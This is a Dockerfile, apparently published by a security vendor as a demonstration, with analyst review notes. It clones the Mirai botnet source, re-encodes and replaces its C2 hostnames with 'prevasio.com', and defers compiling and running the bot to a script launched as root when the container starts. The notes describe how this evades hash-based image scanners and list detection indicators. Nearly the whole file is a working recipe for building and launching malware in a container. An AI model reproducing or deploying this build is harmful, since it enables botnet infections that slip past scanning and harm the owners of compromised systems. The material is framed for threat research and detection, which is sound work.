Dockerfile
The following Dockerfile example demonstrates the dynamic creation of a malicious container image.

The instructions in this file fetch the Mirai source code from GitHub, replace the default C2 server name with 'prevasio.com', and then compile the Mirai bot as /mirai_bot (the compile step is placed in a script that runs when the container starts).
# ---------------------------------------------------------------------------
# Analyst notes (added in review; the instructions below are the sample as published):
#  - The network fetch (git clone) and the source patch (/patch) happen at BUILD time,
#    but compilation is deferred: CMD runs /compile_and_run, which invokes gcc and then
#    launches the result. The pushed image therefore contains only a compiler, the
#    cloned source tree and two shell scripts - no /mirai_bot binary exists in any
#    layer, so scanners that look for the compiled payload's hash see nothing.
#  - Single stage, no USER directive: gcc, git, /Mirai-Source-Code, /patch and
#    /compile_and_run all ship in the final image and CMD executes as root (Ubuntu
#    base default). A compiler and a VCS client in a runtime image, a build-time
#    network fetch of source, and a CMD pointing at a script that compiles on
#    start-up are each policy/detection hooks for build pipelines and admission control.
#  - The C2 hostnames in table.c are stored encoded (the enc.out calls below generate
#    the encoded forms), so plain-string signatures for the domain will not match
#    the source; the presence of the encoder tool itself is the more stable indicator.
# ---------------------------------------------------------------------------
FROM ubuntu:14.04.5
# the image is based on Ubuntu v14.04.5
# updates the package lists
RUN apt update
# install GCC compiler
RUN apt install -y gcc
# install Git
RUN apt install -y git
# fetch Mirai source code
RUN git clone https://github.com/jgamblin/Mirai-Source-Code
# compile string encoder tool
RUN gcc /Mirai-Source-Code/mirai/tools/enc.c -o /Mirai-Source-Code/mirai/tools/enc.out
# drop a shell script into /patch
RUN echo "#!/bin/sh" > /patch
# mirai's source code contains encoded string 'cnc.changeme.com'
# here, we run string encoder tool to encode 'cnc.changeme.com', then escape the encoded string with sed command
# the encoded string is placed into old_cnc variable
RUN echo "old_cnc=\$(printf '%s' \"\$(/Mirai-Source-Code/mirai/tools/enc.out string cnc.changeme.com | tail -1)\" | sed -e 's/[]\/\$*.^|[]/\\\\\\\\&/g')" >> /patch
# do the same with the encoded string 'report.changeme.com'
RUN echo "old_report=\$(printf '%s' \"\$(/Mirai-Source-Code/mirai/tools/enc.out string report.changeme.com | tail -1)\" | sed -e 's/[]\/\$*.^|[]/\\\\\\\\&/g')" >> /patch
# now, encode 'prevasio.com' - our C2's new domain name
# for ethical and legal reasons, this is to make sure we don't touch someone else's domain name
RUN echo "new_domain=\$(printf '%s' \"\$(/Mirai-Source-Code/mirai/tools/enc.out string prevasio.com | tail -1)\" | sed -e 's/[]\/\$*.^|[]/\\\\\\\\&/g')" >> /patch
# next, we'll need to patch the source file table.c
# this is to replace encoded 'cnc.changeme.com' with encoded 'prevasio.com'
RUN echo "sed -i \"s/\$old_cnc/\$new_domain/g\" /Mirai-Source-Code/mirai/bot/table.c" >> /patch
# do the same to replace encoded 'report.changeme.com' with encoded 'prevasio.com'
RUN echo "sed -i \"s/\$old_report/\$new_domain/g\" /Mirai-Source-Code/mirai/bot/table.c" >> /patch
# make our script executable
RUN chmod +x /patch
# run it to make 2 patches to table.c source
RUN /patch
# drop a shell script to compile and run the bot into /compile_and_run
# (this script is only written here; it is executed by CMD when the container starts)
RUN echo "#!/bin/bash" > /compile_and_run
# compile the bot from source with GCC
RUN echo "gcc -std=c99 /Mirai-Source-Code/mirai/bot/*.c -DDEBUG -DMIRAI_TELNET -static -g -o /mirai_bot" >> /compile_and_run
# run the bot in the background
# (as written the script does not background it with '&'; presumably the binary detaches itself - unverified)
RUN echo "/mirai_bot" >> /compile_and_run
# make the script executable
RUN chmod +x /compile_and_run
# execute the script
CMD ["/compile_and_run"]